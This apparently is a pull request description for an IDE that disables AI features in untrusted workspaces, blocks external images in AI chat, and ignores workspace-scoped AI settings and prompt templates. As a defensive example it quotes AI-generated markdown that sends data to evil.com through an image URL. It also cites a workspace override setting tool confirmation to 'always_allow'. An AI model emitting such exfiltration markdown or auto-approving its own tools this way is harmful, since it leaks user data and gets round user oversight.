Hook workspace trust into AI features

[jfaltermeier]

What it does

Hooks workspace trust into AI features so that all AI functionality is disabled in Restricted Mode, fixes #16892.

1. The existing AIActivationService.isActive reflects the enableAI preference and controls UI visibility, views, menus, toolbar items, context key. This PR keeps isActive unchanged and adds a new canRun property that reflects isActive && workspaceTrusted. All functional checks, command isEnabled, chat input enablement, inline completion guards, code action guards, now use canRun instead of isActive, while visibility checks stay on isActive.

This results in three states:

• Preference OFF: AI UI hidden, unchanged
• Preference ON, trusted: everything works, unchanged
• Preference ON, untrusted: AI views and menus stay visible but functionality is disabled. Chat shows a trust specific message with a "Manage Workspace Trust" button. Granting trust re enables everything reactively.

Commit 1-3 address this.

2. Additionally, external image loading in AI chat markdown is blocked in untrusted workspaces. When the workspace is not trusted, <img> elements with external URLs, for example from AI generated markdown like ![](https://evil.com/track?data=...), are replaced with a [External image blocked] placeholder. Images using data: URIs, for example user attached images or tool call results, are always allowed. In trusted workspaces, external images render normally.

The fourth commit addresses image loading.

3. Finally, workspace scoped AI preferences that can influence AI behavior are ignored in Restricted Mode. This is done narrowly at the relevant read sites via a small TrustAwarePreferenceReader helper. When the workspace is untrusted, get drops workspace and folder values and falls back to the user or default value. Writes continue through the normal PreferenceService.
   The preferences covered in this PR are tool confirmation, ai-features.chat.toolConfirmation, language model aliases, ai-features.modelSettings.languageModelAliases, and agent settings, ai-features.agentSettings. Other AI preferences only affect UX and continue to use PreferenceService unchanged. Additionally, workspace prompt templates, .prompts/*.prompttemplate and configured template directories, files, and extensions, are unloaded in Restricted Mode and reloaded when trust is granted.

The last commit addresses preferences and prompt templates.

How to test

Enable enableAI and security.workspace.trust.enabled, then open a folder and deny trust. Verify that AI views remain visible but functionality is disabled, chat shows an "AI Features are Restricted" message with a "Manage Workspace Trust" button, chat input is disabled, AI commands are greyed out, inline completions and code actions do not trigger, and workspace prompt templates are not loaded. Granting trust should re enable everything immediately, revoking trust should disable it again.

To test external image blocking in isolation, without the canRun gate disabling AI chat entirely, you can temporarily change packages/ai-ide/src/browser/ai-ide-activation-service.ts line 68:

get canRun(): boolean {
    return this.isActive; 
}

To test the trust aware preference wrapper in isolation, apply the same temporary change so AI chat stays functional, then set a workspace scoped override in .theia/settings.json, for example "ai-features.chat.toolConfirmation": { "*": "always_allow" }.

With the workspace untrusted, the effective value seen by AI should still come from user or default, so confirmation prompts should still appear. Granting trust should make the workspace override take effect without a reload, revoking trust should hide it again.

Follow ups

An earlier iteration of this PR tried to introduce a generic AIPreferenceService wrapper around PreferenceService as a facade and rewired all AI packages to inject it.
However there were multiple smaller issues, like with proxies or initialization order, that made me revert this.
For now this PR has only targeted fixes.
As a follow up, it might be worth investigating to add trust aware reads into the core PreferenceService itself, so the behavior is available framework wide and AI code can stop using a dedicated helper.

Breaking changes

• This PR introduces breaking changes and requires careful review. If yes, the breaking changes section in the changelog has been updated.

Attribution

Contributed on behalf of STMicroelectronics

Review checklist

• As an author, I have thoroughly tested my changes and carefully followed the review guidelines
• User-facing text is internationalized using the nls service (for details, please see the Internationalization/Localization section in the Coding Guidelines)

Reminder for reviewers

• As a reviewer, I agree to behave in accordance with the review guidelines